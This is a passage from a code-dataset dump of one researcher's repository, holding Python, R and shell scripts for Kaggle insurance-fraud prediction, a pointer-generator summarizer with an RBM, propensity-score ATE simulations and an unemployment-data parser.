True)\ntest.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\", \"Unem_rate\"],\n axis = 1, inplace = True)\ntrain = train.filter(regex=\"^(?!state_).*$\")\ntest = test.filter(regex=\"^(?!state_).*$\")\n\n\n\n##### Final Model #####\ny = train[\"fraud\"]\nX = train.drop(\"fraud\", 1)\nclf = xgb.XGBClassifier(max_depth=3,\n learning_rate=0.06,\n n_estimators=180,\n silent=True,\n objective='binary:logistic',\n gamma=0.35,\n min_child_weight=5,\n max_delta_step=0,\n subsample=0.8,\n colsample_bytree=0.785,\n colsample_bylevel=1,\n reg_alpha=0.01,\n reg_lambda=1,\n scale_pos_weight=1,\n seed=1440,\n missing=None)\n\n## CV AUC score\nscores = model_selection.cross_val_score(clf, X.values, y.values, cv = 6, scoring = 'roc_auc')\nprint(scores)\nprint(\"AUC: %0.4f (+/- %0.4f)\" % (scores.mean(), scores.std()))\n\n## Final prediction on the test data\nclf.fit(X, y)\ny_pred = clf.predict_proba(test)[:,1]\ntest = pd.read_csv(\"test_data_clean2.csv\")\ntest_output = {'claim_number':test['claim_number'], 'fraud':y_pred}\ntest_output = pd.DataFrame(data = test_output)\ntest_output = test_output.set_index('claim_number')\ntest_output.to_csv(\"predictions/prediction_xgboost4.csv\")\n\n## Feature importance \nplot_importance(clf)\npyplot.show()\n\n\n" }, { "alpha_fraction": 0.7075471878051758, "alphanum_fraction": 0.7452830076217651, "avg_line_length": 34, "blob_id": "cd1376166b607feda98360c36f539d64628fc746", "content_id": "cae37140a94c328282207e5730f99748408dc15e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 106, "license_type": "permissive", "max_line_length": 71, "num_lines": 3, "path": 
"/rbm_summarizer/start_decode.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "export PYTHONPATH=`pwd`\nMODEL=$1\npython training_ptr_gen/decode.py $MODEL >& log/decode_rbmpg_500k_log &\n\n" }, { "alpha_fraction": 0.7469879388809204, "alphanum_fraction": 0.7469879388809204, "avg_line_length": 40, "blob_id": "0da869aaa6e46b753c303a8120a0e162fe86a6f2", "content_id": "b4c8c2a5974324ac0ff7e52fe0e9719eaa1d424a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 83, "license_type": "permissive", "max_line_length": 57, "num_lines": 2, "path": "/rbm_summarizer/start_train.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "export PYTHONPATH=`pwd`\npython training_ptr_gen/train.py >& log/train_rbmpg_log &\n\n" }, { "alpha_fraction": 0.6712538003921509, "alphanum_fraction": 0.6926605701446533, "avg_line_length": 35.33333206176758, "blob_id": "ef6143904423a21e2532b2917b7e485c80f7aebb", "content_id": "23270633cfc86c6c37c4414e61bc2625c8134d60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 100, "num_lines": 18, "path": "/textual_causality/etm-ps/plot_lens.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nwith open(\"save/document_lengths.json\", \"r\") as fp:\n doc_lens = json.load(fp)\n\ndoc_lens = np.array(list(doc_lens.values()))\nprint(doc_lens)\nplt.hist(doc_lens, bins = \"auto\")\nplt.title(\"Histogram of document lengths\")\nplt.savefig(\"save/doc_lens_hist.jpg\")\n\nprint(\"Summary Statistics:\")\nprint(f\"Min = {np.mean(doc_lens)}, Max = {np.max(doc_lens)}, Median = {np.median(doc_lens)}\")\nprint(f\"Standard Deviation = {np.std(doc_lens)}\")\nprint(f\"1st Quartile = {np.quantile(doc_lens, 0.25)}, 3rd Quartile = 
{np.quantile(doc_lens, 0.75)}\")\nprint(f\"{np.mean(doc_lens > 800)} are longer than 800.\")\n" }, { "alpha_fraction": 0.46580106019973755, "alphanum_fraction": 0.5070716142654419, "avg_line_length": 30.47445297241211, "blob_id": "2c4f48dac5ffbfb3977d7e6b7fef85e202d07692", "content_id": "3fcef3c1d165debff5a1a4498da89c9f8bbddd26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 4313, "license_type": "no_license", "max_line_length": 80, "num_lines": 137, "path": "/textual_causality/ate/ate.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "library(ggplot2)\nlibrary(reshape2)\nlibrary(doParallel)\nlibrary(dplyr)\n\n# this file works on the simulated data to estimate ATE\ndata <- read.csv(\"sim_data.csv\")\nhead(data)\n\n##========= Tune the parameter settings ===========##\n# gammas <- c(-2.45, -2.46, -2.47, -2.48)\n# res <- foreach(gamma = gammas, .combine = \"rbind\") %dopar% {\n# c(gamma, ate.sim.comp(data, params = c(-1, 4, gamma)))\n# }\n# res\n\nate.sim.comp <- function(data, params, seed = 2021) {\n require(rms)\n set.seed(seed)\n data$y <- rbinom(nrow(data), 1, \n plogis(params[1] * data$Treat + params[2] * data$True_PS + \n params[3]))\n \n # True ATE\n ATE.true <- mean(plogis(params[1] + params[2] * data$True_PS + params[3])) - \n mean(plogis(params[2] * data$True_PS + params[3]))\n \n # Unadjusted ATE\n ATE.unadj <- mean(data$y[data$Treat == 1]) - \n mean(data$y[data$Treat == 0])\n \n # PS Regression Adjustment\n mod.ps <- glm(y ~ Treat * rcs(Est_PS, 5), data = data, \n family = \"binomial\")\n data_trt <- data_ctr <- data\n data_trt$Treat <- 1\n data_ctr$Treat <- 0\n pred1.ps <- predict(mod.ps, newdata = data_trt, type = \"response\")\n pred0.ps <- predict(mod.ps, newdata = data_ctr, type = \"response\")\n ATE.PSReg <- mean(pred1.ps - pred0.ps)\n \n # PSS\n ps_quintile <- cut(data$Est_PS, \n breaks = c(0, quantile(data$Est_PS, p = 1:9 / 10 ), 1), \n labels = 1:10)\n 
table(ps_quintile, data$Treat)\n n <- nrow(data)\n nj <- table(ps_quintile)\n te_quintile <- tapply(data$y[data$Treat == 1], \n ps_quintile[data$Treat == 1], mean) - \n tapply(data$y[data$Treat == 0], \n ps_quintile[data$Treat == 0], mean)\n ATE.PSS <- sum(te_quintile * nj / n)\n \n # IPW\n w1 <- data$Treat / data$Est_PS\n w0 <- (1 - data$Treat) / (1 - data$Est_PS)\n ATE.IPW <- mean(data$y * w1) - mean(data$y * w0)\n \n # IPW2\n ATE.IPW2 <- weighted.mean(data$y, w1) - \n weighted.mean(data$y, w0)\n \n \n res <- c(params, mean(data$y), \n ATE.true, ATE.unadj, ATE.PSReg, ATE.PSS, ATE.IPW, ATE.IPW2)\n names(res) <- c(\"alpha\", \"beta\", \"gamma\", \"y.mean\", \"Truth\", \n \"Unadjusted\", \"PSReg\", \n \"PSS\", \"IPW\", \"IPW2\")\n res\n}\n\n\n##========================= Controlling mean of y ===========================##\n# to keep mean of y nearly constant\nget.param.setting <- function(param.type) {\n switch(param.type, \n c(-1, 1, -1), \n c(-1, 2, -1.6), \n c(-1, 3, -2.1), \n c(-1, 4, -2.7), \n c(-1, 5, -3.2), \n c(-1, 6, -3.75), \n c(-1, 7, -4.3), \n c(-1, 8, -4.85), \n c(-1, 9, -5.4), \n c(-1, 10, -6))\n}\nnrep <- 100\nregisterDoParallel(cores = 4)\nate_res <- c()\nfor (param.type in 1:10) {\n res <- foreach(rep = 1:nrep, .combine = \"rbind\") %dopar% {\n c(param.type, rep, \n ate.sim.comp(data, params = get.param.setting(param.type), \n seed = 2021 + param.type + rep))\n }\n ate_res <- rbind(ate_res, res)\n}\ncolnames(ate_res) <- c(\"Setting\", \"rep\", \"alpha\", \"beta\", \"gamma\", \"y.mean\", \n \"Truth\", \"Unadjusted\", \"PSReg\", \"PSS\", \"IPW\", \"IPW2\")\nwrite.csv(ate_res, file = \"../results/ate_results.csv\")\n\n\n##========================= Controlling ATE ===========================##\n# to keep ATE nearly constant\nget.param.setting2 <- function(param.type) {\n switch(param.type, \n c(-1, 1, -1), \n c(-1, 2, -1.5), \n c(-1, 3, -2.0), \n c(-1, 4, -2.47), \n c(-1, 5, -2.95), \n c(-1, 6, -3.4), \n c(-1, 7, -3.8), \n c(-1, 8, -4.15), \n c(-1, 9, 
-4.45), \n c(-1, 10, -4.5))\n}\n\nnrep <- 100\nregisterDoParallel(cores = 4)\nate_res <- c()\nfor (param.type in 1:10) {\n res <- foreach(rep = 1:nrep, .combine = \"rbind\") %dopar% {\n c(param.type, rep, \n ate.sim.comp(data, params = get.param.setting2(param.type), \n seed = 2021 + param.type + rep))\n }\n ate_res <- rbind(ate_res, res)\n}\ncolnames(ate_res) <- c(\"Setting\", \"rep\", \"alpha\", \"beta\", \"gamma\", \"y.mean\", \n \"Truth\", \"Unadjusted\", \"PSReg\", \"PSS\", \"IPW\", \"IPW2\")\nwrite.csv(ate_res, file = \"../results/ate_results2.csv\")\n\nate_res_print <- get.res.print(ate_res)\nwrite.csv(ate_res_print, file = \"../results/ate_results_print2.csv\")\n\n" }, { "alpha_fraction": 0.5494276881217957, "alphanum_fraction": 0.5565961599349976, "avg_line_length": 37.9504508972168, "blob_id": "172772f65d4c5bcffb138d926d04f34df74592eb", "content_id": "77e9472edaed267f4caf71a34cfb199c9905f83a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8649, "license_type": "permissive", "max_line_length": 127, "num_lines": 222, "path": "/rbm_summarizer/training_ptr_gen/decode.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "#Except for the pytorch part content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/\n\nfrom __future__ import unicode_literals, print_function, division\n\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport os\nimport time\n\nimport torch\nfrom torch.autograd import Variable\n\nfrom data_util.batcher import Batcher\nfrom data_util.data import Vocab\nfrom data_util import data, config\nfrom data_util import utils\nfrom model import Model\nfrom data_util.utils import write_for_rouge, rouge_eval, rouge_log\nfrom train_util import get_input_from_batch, get_rbm_output_from_batch\n\n\nuse_cuda = config.use_gpu and torch.cuda.is_available()\n\nclass Beam(object):\n def __init__(self, tokens, 
log_probs, state, context, coverage):\n self.tokens = tokens\n self.log_probs = log_probs\n self.state = state\n self.context = context\n self.coverage = coverage\n\n def extend(self, token, log_prob, state, context, coverage):\n return Beam(tokens = self.tokens + [token],\n log_probs = self.log_probs + [log_prob],\n state = state,\n context = context,\n coverage = coverage)\n\n @property\n def latest_token(self):\n return self.tokens[-1]\n\n @property\n def avg_log_prob(self):\n return sum(self.log_probs) / len(self.tokens)\n\n\nclass BeamSearch(object):\n def __init__(self, model_file_path, device):\n model_name = os.path.basename(model_file_path)\n self._decode_dir = os.path.join(config.log_root, 'decode_%s' % (model_name))\n self._rouge_ref_dir = os.path.join(self._decode_dir, 'rouge_ref')\n self._rouge_dec_dir = os.path.join(self._decode_dir, 'rouge_dec_dir')\n for p in [self._decode_dir, self._rouge_ref_dir, self._rouge_dec_dir]:\n if not os.path.exists(p):\n os.mkdir(p)\n\n self.vocab = Vocab(config.vocab_path, config.vocab_size)\n self.batcher = Batcher(config.decode_data_path, self.vocab, mode='decode',\n batch_size=config.beam_size, single_pass=True)\n time.sleep(15)\n\n self.model = Model(model_file_path, is_eval=True)\n \n self.model.encoder = self.model.encoder.to(device)\n self.model.decoder = self.model.decoder.to(device)\n self.model.reduce_state = self.model.reduce_state.to(device)\n self.device = device\n\n def sort_beams(self, beams):\n return sorted(beams, key=lambda h: h.avg_log_prob, reverse=True)\n\n\n def decode(self):\n start = time.time()\n counter = 0\n batch = self.batcher.next_batch()\n while batch is not None:\n # Run beam search to get best Hypothesis\n best_summary = self.beam_search(batch)\n\n # Extract the output ids from the hypothesis and convert back to words\n output_ids = [int(t) for t in best_summary.tokens[1:]]\n decoded_words = data.outputids2words(output_ids, self.vocab,\n (batch.art_oovs[0] if config.pointer_gen else 
None))\n\n # Remove the [STOP] token from decoded_words, if necessary\n try:\n fst_stop_idx = decoded_words.index(data.STOP_DECODING)\n decoded_words = decoded_words[:fst_stop_idx]\n except ValueError:\n decoded_words = decoded_words\n\n original_abstract_sents = batch.original_abstracts_sents[0]\n\n write_for_rouge(original_abstract_sents, decoded_words, counter,\n self._rouge_ref_dir, self._rouge_dec_dir)\n counter += 1\n if counter % 1000 == 0:\n print('%d example in %d sec'%(counter, time.time() - start))\n start = time.time()\n\n batch = self.batcher.next_batch()\n\n print(\"Decoder has finished reading dataset for single_pass.\")\n print(\"Now starting ROUGE eval...\")\n results_dict = rouge_eval(self._rouge_ref_dir, self._rouge_dec_dir)\n rouge_log(results_dict, self._decode_dir)\n\n\n def beam_search(self, batch):\n #batch should have only one example\n enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_0, coverage_t_0 = \\\n get_input_from_batch(batch, use_cuda, self.device)\n \n # get the latent representation of the documents\n if config.add_rbm: \n latent_batch = get_rbm_output_from_batch(batch, self.vocab, use_cuda, self.device)\n else:\n latent_batch = None\n\n encoder_outputs, encoder_feature, encoder_hidden = self.model.encoder(enc_batch, enc_lens)\n s_t_0 = self.model.reduce_state(encoder_hidden)\n\n dec_h, dec_c = s_t_0 # 1 x 2*hidden_size\n dec_h = dec_h.squeeze()\n dec_c = dec_c.squeeze()\n\n #decoder batch preparation, it has beam_size example initially everything is repeated\n beams = [Beam(tokens=[self.vocab.word2id(data.START_DECODING)],\n log_probs=[0.0],\n state=(dec_h[0], dec_c[0]),\n context = c_t_0[0],\n coverage=(coverage_t_0[0] if config.is_coverage else None))\n for _ in xrange(config.beam_size)]\n results = []\n steps = 0\n while steps < config.max_dec_steps and len(results) < config.beam_size:\n latest_tokens = [h.latest_token for h in beams]\n latest_tokens = [t if t < self.vocab.size() else 
self.vocab.word2id(data.UNKNOWN_TOKEN) \\\n for t in latest_tokens]\n y_t_1 = Variable(torch.LongTensor(latest_tokens))\n if use_cuda:\n # y_t_1 = y_t_1.cuda()\n y_t_1 = y_t_1.to(self.device)\n all_state_h =[]\n all_state_c = []\n\n all_context = []\n\n for h in beams:\n state_h, state_c = h.state\n all_state_h.append(state_h)\n all_state_c.append(state_c)\n\n all_context.append(h.context)\n\n s_t_1 = (torch.stack(all_state_h, 0).unsqueeze(0), torch.stack(all_state_c, 0).unsqueeze(0))\n c_t_1 = torch.stack(all_context, 0)\n\n coverage_t_1 = None\n if config.is_coverage:\n all_coverage = []\n for h in beams:\n all_coverage.append(h.coverage)\n coverage_t_1 = torch.stack(all_coverage, 0)\n\n final_dist, s_t, c_t, attn_dist, p_gen, coverage_t = self.model.decoder(y_t_1, s_t_1,\n encoder_outputs, encoder_feature, enc_padding_mask, c_t_1,\n extra_zeros, enc_batch_extend_vocab, coverage_t_1, steps, latent_batch)\n log_probs = torch.log(final_dist)\n topk_log_probs, topk_ids = torch.topk(log_probs, config.beam_size * 2)\n\n dec_h, dec_c = s_t\n dec_h = dec_h.squeeze()\n dec_c = dec_c.squeeze()\n\n all_beams = []\n num_orig_beams = 1 if steps == 0 else len(beams)\n for i in xrange(num_orig_beams):\n h = beams[i]\n state_i = (dec_h[i], dec_c[i])\n context_i = c_t[i]\n coverage_i = (coverage_t[i] if config.is_coverage else None)\n\n for j in xrange(config.beam_size * 2): # for each of the top 2*beam_size hyps:\n new_beam = h.extend(token=topk_ids[i, j].item(),\n log_prob=topk_log_probs[i, j].item(),\n state=state_i,\n context=context_i,\n coverage=coverage_i)\n all_beams.append(new_beam)\n\n beams = []\n for h in self.sort_beams(all_beams):\n if h.latest_token == self.vocab.word2id(data.STOP_DECODING):\n if steps >= config.min_dec_steps:\n results.append(h)\n else:\n beams.append(h)\n if len(beams) == config.beam_size or len(results) == config.beam_size:\n break\n\n steps += 1\n\n if len(results) == 0:\n results = beams\n\n beams_sorted = self.sort_beams(results)\n\n return 
beams_sorted[0]\n\nif __name__ == '__main__':\n model_filename = sys.argv[1]\n # device = utils.get_devices(config.gpu_ids)\n device = utils.get_devices([7])\n # config.add_rbm=False\n beam_Search_processor = BeamSearch(model_filename, device)\n beam_Search_processor.decode()\n\n\n" }, { "alpha_fraction": 0.6354857087135315, "alphanum_fraction": 0.6477939486503601, "avg_line_length": 47.907405853271484, "blob_id": "4ea2d363c2ab6376651f223b9571241d2aa2b53c", "content_id": "dc36421247b5b74e8430c44c251179d4041ac1a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5281, "license_type": "no_license", "max_line_length": 111, "num_lines": 108, "path": "/Kaggle_Travelers/notebooks/LightGBM.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nfrom xgboost import XGBClassifier\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier, \n GradientBoostingClassifier, VotingClassifier)\nfrom mlxtend.classifier import StackingCVClassifier\nfrom lightgbm import LGBMClassifier\nimport lightgbm as lgb\nimport warnings\nwarnings.filterwarnings('ignore')\nfrom sklearn.metrics import roc_auc_score\n\n\n##### Data Manipulation #####\n# read full training data set\ndf_train = pd.read_csv('../data/train_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_train['gender'], \n prefix = 'gender', drop_first = True)\ndf_train = pd.concat([df_train, gender_dummies], axis = 1)\ndf_train.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_train['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_train = pd.concat([df_train, living_status_dummies], axis = 1)\ndf_train.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_train['state'], 
\n prefix = 'state', drop_first = True)\ndf_train = pd.concat([df_train, state_dummies], axis = 1)\ndf_train.drop([\"state\"], axis = 1, inplace = True)\n\ndf_train = df_train.sample(frac=1, random_state=5)\ndf_train['new_param'] = df_train.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n#df_train['prct_payout'] = df_train.apply(lambda col: col['claim_est_payout']/(col['annual_income']), axis=1)\n#df_train['age_over_safety'] = df_train.apply(lambda col: col['age_of_driver']/(col['safty_rating']+1), axis=1)\ndf_train.set_index('claim_number', inplace=True)\ndf_train.sort_index(inplace=True)\ndf_train.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_train = df_train.filter(regex=\"^(?!state_).*$\")\ndf_train = df_train.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_day_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_month_).*$\")\n\ntrain_lgb = df_train.copy()\n\n\n# read full testing data set\ndf_test = pd.read_csv('../data/test_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_test['gender'], \n prefix = 'gender', drop_first = True)\ndf_test = pd.concat([df_test, gender_dummies], axis = 1)\ndf_test.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_test['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_test = pd.concat([df_test, living_status_dummies], axis = 1)\ndf_test.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_test['state'], \n prefix = 'state', drop_first = True)\ndf_test = pd.concat([df_test, 
state_dummies], axis = 1)\ndf_test.drop([\"state\"], axis = 1, inplace = True)\n\n#df_test = df_test.sample(frac=1, random_state=5)\ndf_test['new_param'] = df_test.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n#df_test['prct_payout'] = df_test.apply(lambda col: col['claim_est_payout']/(col['annual_income']), axis=1)\n#df_test['age_over_safety'] = df_test.apply(lambda col: col['age_of_driver']/(col['safty_rating']+1), axis=1)\n\ndf_test.set_index('claim_number', inplace=True)\ndf_test.sort_index(inplace=True)\ndf_test.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_test = df_test.filter(regex=\"^(?!state_).*$\")\ndf_test = df_test.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_day_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_month_).*$\")\n\ntest_lgb = df_test.copy()\n\n\n##### Final Model #####\nlgbm_params = {'boosting_type':'gbdt', 'objective':'binary', 'num_boost_round':800,\n 'feature_fraction': .321, 'bagging_fraction':0.50, 'min_child_samples':100, \n 'min_child_weigh':35, 'max_depth':3, 'num_leaves':2, 'learing_rate':0.15,\n 'reg_alpha':5, 'reg_lambda': 1.1, 'metric':'auc', 'max_bin': 52,\n 'colsample_bytree': 0.9, 'subsample': 0.8, 'is_unbalance': 'true'\n}\n\ny_train = train_lgb[\"fraud\"]\nX_train = train_lgb.drop(\"fraud\", 1)\n\nlgbm = LGBMClassifier(**lgbm_params)\nlgbm.fit(X_train.values, y_train.values)\ny_preds = lgbm.predict_proba(test_lgb.values)[:,1]\n\ntest_lgb['fraud'] = y_preds\nresults = test_lgb.filter(['fraud'], axis=1)\nresults.to_csv('results_12_6-3.csv', header=True)" }, { "alpha_fraction": 
0.5737813115119934, "alphanum_fraction": 0.5783926248550415, "avg_line_length": 26.581817626953125, "blob_id": "b6afcfba5c246c005f097009af29ba05d66b72f0", "content_id": "50d031df527f0777164c9dd80f3e7394e5e06986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1518, "license_type": "no_license", "max_line_length": 77, "num_lines": 55, "path": "/Kaggle_Travelers/data/unemployment_data/unemp_parser.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nUnemployment Data Parsing\n\nThis script collects the unemployment statistics from\nthe 5 different states are saves a loadable dictionary\nfor easy access.\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\nimport pickle\nimport re\n\nstates = ['AZ', 'CO', 'IA', 'PA', 'VA']\ncsv_files = [state.lower() + '_unemp.csv' for state in states]\n\nunemp_data = None\n\nfor csv_file, state in zip(csv_files, states):\n state_data = pd.read_csv(csv_file)\n state_data.drop(['Series ID', 'Period'], axis=1, inplace=True)\n \n state_data.rename(columns={'Year': 'year', 'Label': 'year_month', \n 'Value': 'unemp_rate'},\n inplace=True)\n state_data['state'] = state\n if unemp_data is None:\n unemp_data = state_data\n else:\n unemp_data = train_data = pd.concat([unemp_data, state_data], axis=0)\n\n\nshort_month_to_long = {\n 'Jan': 'January',\n 'Feb': 'February',\n 'Mar': 'March',\n 'Apr': 'April',\n 'May': 'May',\n 'Jun': 'June',\n 'Jul': 'July',\n 'Aug': 'August',\n 'Sep': 'September',\n 'Oct': 'October',\n 'Nov': 'November',\n 'Dec': 'December'\n }\nmonth_data = unemp_data['year_month'].values\nmonth_re_object = re.compile('\\d+\\s(\\w{3})')\nmonth_data = [short_month_to_long[re.match(rexp_object, x).group(1)]\n for x in month_data]\nunemp_data['month'] = month_data\nunemp_data.drop(['year_month'], inplace=True, axis=1)\n\nunemp_data.to_pickle('unemp_data.pkl')\n\n" }, { "alpha_fraction": 0.46317991614341736, 
"alphanum_fraction": 0.49623429775238037, "avg_line_length": 38.766666412353516, "blob_id": "0b847a50aff6ca639fab38a5fb203fb51b621ece", "content_id": "68f75b4fb323eebd5a2bb3097698516070b3cf29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 2390, "license_type": "no_license", "max_line_length": 81, "num_lines": 60, "path": "/textual_causality/ate/plot.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "library(dplyr)\nlibrary(reshape2)\nlibrary(ggplot2)\n\ngen.plot <- function(ate_res, save_path) {\n ate_res_plot <- as.data.frame(ate_res) %>% \n group_by(Setting, alpha, beta, gamma) %>%\n summarise(y.mean.sd = sd(y.mean),\n y.mean = mean(y.mean), \n Truth = mean(Truth), \n Unadjusted.sd = sd(Unadjusted), \n Unadjusted = mean(Unadjusted), \n PSReg.sd = sd(PSReg), \n PSReg = mean(PSReg), \n PSS.sd = sd(PSS),\n PSS = mean(PSS), \n IPW.sd = sd(IPW), \n IPW = mean(IPW), \n IPW2.sd = sd(IPW2),\n IPW2 = mean(IPW2))\n \n ate_res_plot <- melt(ate_res, \n id.vars = c(\"Setting\", \"rep\", \"alpha\", \"beta\", \"gamma\", \n \"y.mean\"), \n variable.name = \"Method\")\n \n ate_res_plot <- ate_res_plot %>% \n group_by(Setting, alpha, beta, gamma, Method) %>% \n summarise(val.avg = mean(value, na.rm = TRUE), \n val.se = sd(value, na.rm = TRUE))\n \n gp <- ggplot(ate_res_plot, \n aes_string(x = \"beta\", y = \"val.avg\", color = \"Method\")) + \n xlab(expression(beta)) + ylab(\"ATE\") + \n ggtitle(\"Average Treatment Effect Estimation\") + \n scale_x_discrete(limits = factor(1:10)) + \n geom_line(lwd = 1.5) + geom_point(pch = 19) +\n scale_color_manual(values = c(\"#000000\", \"#f76161\", \"#2990ff\", \"#712a95\",\n \"#27e838\", \"#ffc864\", \"#D55E00\", \"#CC79A7\")) + \n theme_bw() + theme(legend.position = \"bottom\", \n plot.title = element_text(hjust = 0.5, size = 25), \n legend.text = element_text(size = 15), \n axis.title = element_text(size = 20), \n axis.text = element_text(size = 20)) + \n 
geom_errorbar(aes(ymin = val.avg - qnorm(0.975) * val.se, \n ymax = val.avg + qnorm(0.975) * val.se), width = 0.02, \n lwd = 1.5)\n \n ggsave(filename = save_path, plot = gp, width = 30, height = 25,\n units = \"cm\")\n}\n\n\nate_res <- read.csv(\"../results/ate_results.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\ngen.plot(ate_res, \"../results/ate_results.pdf\")\n\nate_res <- read.csv(\"../results/ate_results2.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\ngen.plot(ate_res, \"../results/ate_results2.pdf\")\n\n\n\n\n" }, { "alpha_fraction": 0.6261386275291443, "alphanum_fraction": 0.6423762440681458, "avg_line_length": 29.409639358520508, "blob_id": "428ca5e697a4b914d90ba9f5327bcf757938298f", "content_id": "caf742009f057fe6c500aa78193b0e69529eb096", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2525, "license_type": "permissive", "max_line_length": 106, "num_lines": 83, "path": "/rbm_summarizer/train_textRBM/run_textRBM.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function, division\n# load modules in other files\nimport sys\nimport os\nimport time\n\n# module_path = os.path.abspath(os.path.join('..'))\n# if module_path not in sys.path:\n# sys.path.append(module_path)\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.nn.utils import clip_grad_norm_\n\n# # autoreload self-defined modules\n# %load_ext autoreload\n# %autoreload 2\n\nfrom data_util import utils\nfrom data_util import config\nfrom data_util.batcher import Batcher\nfrom data_util.data import Vocab\nfrom data_util.utils import calc_running_avg_loss\nfrom training_ptr_gen.train_util import get_rbm_input_from_batch\n\nfrom textRBM import TextRBM\nfrom training_ptr_gen.train import Train\n\n\ndef save(save_dir, iter, model):\n 
ckpt_dict = {'model_state': model.state_dict(), 'iter': iter}\n ckpt_path = os.path.join(save_dir, \"iter_%d.pth.tar\" % iter)\n torch.save(ckpt_dict, ckpt_path)\n\nif __name__ == '__main__':\n\n vocab = Vocab(config.vocab_path, config.vocab_size)\n batcher = Batcher(config.train_data_path, vocab, mode='train',\n batch_size=128, single_pass=False)\n time.sleep(15)\n\n import time\n start_time = time.time()\n save_dir = \"/home/yang6367/gitrepos/pointer_summarizer/train_textRBM/save/rbm%d\" % int(start_time)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n use_cuda = True\n device = utils.get_devices([5])\n rbm = TextRBM(k=1, device=device).to(device)\n train_op = optim.Adagrad(rbm.parameters(), lr=0.15, initial_accumulator_value=config.adagrad_init_acc)\n\n iter = 0\n niters = 5000\n loss_ = []\n while iter < niters:\n batch = batcher.next_batch()\n docs_word_count = get_rbm_input_from_batch(batch, vocab, use_cuda, device)\n\n v,v1 = rbm(docs_word_count.float())\n loss = rbm.free_energy(v) - rbm.free_energy(v1)\n loss_.append(loss.data)\n train_op.zero_grad()\n loss.backward()\n clip_grad_norm_(rbm.parameters(), config.max_grad_norm)\n train_op.step()\n\n iter += 1\n\n # update k\n if iter % 1000 == 0:\n rbm.k = int(iter / 1000) + 1\n if iter % 50 == 0:\n print(\"Training loss for %d iter: %.5f\" % (iter, np.mean(loss_)))\n loss_ = []\n if iter % 200 == 0:\n save(save_dir, iter, rbm)\n\n print(\"%f seconds\" % (time.time() 